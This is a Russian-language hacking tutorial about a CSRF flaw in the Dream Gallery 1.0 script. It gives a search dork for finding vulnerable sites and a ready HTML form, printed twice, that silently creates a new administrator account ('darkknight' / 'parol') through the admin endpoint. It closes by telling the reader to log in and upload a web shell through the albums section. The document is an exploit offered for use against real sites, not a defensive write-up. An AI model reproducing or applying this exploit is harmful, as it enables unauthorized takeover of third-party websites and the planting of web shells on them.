В скрипте Dream Gallery 1.0 найдено уязвимость CSRF - Add Admin Т.е можно в админке создать нового админа Дорк: "Design by Rafael Clares" В найденных сайта ищем админку. site.ru/admin Как только найдем сайта с админкой можно приступить к взлому Открываем блокнот и пишем такой код <html> <bOdy> <form method="post" action="http://site.ru/admin/usuario.php?action=incluir"> <input type="hidden" name="user_login" value="darkknight"> <input type="hidden" name="user_password" type="hidden" value="parol" > <input type="hidden" name="user_email" value=""> <input type="submit" value="hack"> </form> </bOdy> </html> Code <html> <bOdy> <form method="post" action="http://site.ru/admin/usuario.php?action=incluir"> <input type="hidden" name="user_login" value="darkknight"> <input type="hidden" name="user_password" type="hidden" value="parol" > <input type="hidden" name="user_email" value=""> <input type="submit" value="hack"> </form> </bOdy> </html> тут darkknight будет логин админа parol - пароль админа site.ru - тут меняем только домен у которого мы нашли админку сохраняем как html и запускаем в браузере После того как нажимаем кнопку hack мы попадаем в админку сайта там будет надпись Hey Dude! После этого можно спокойно зайти в раздел albums и загрузить туда шелл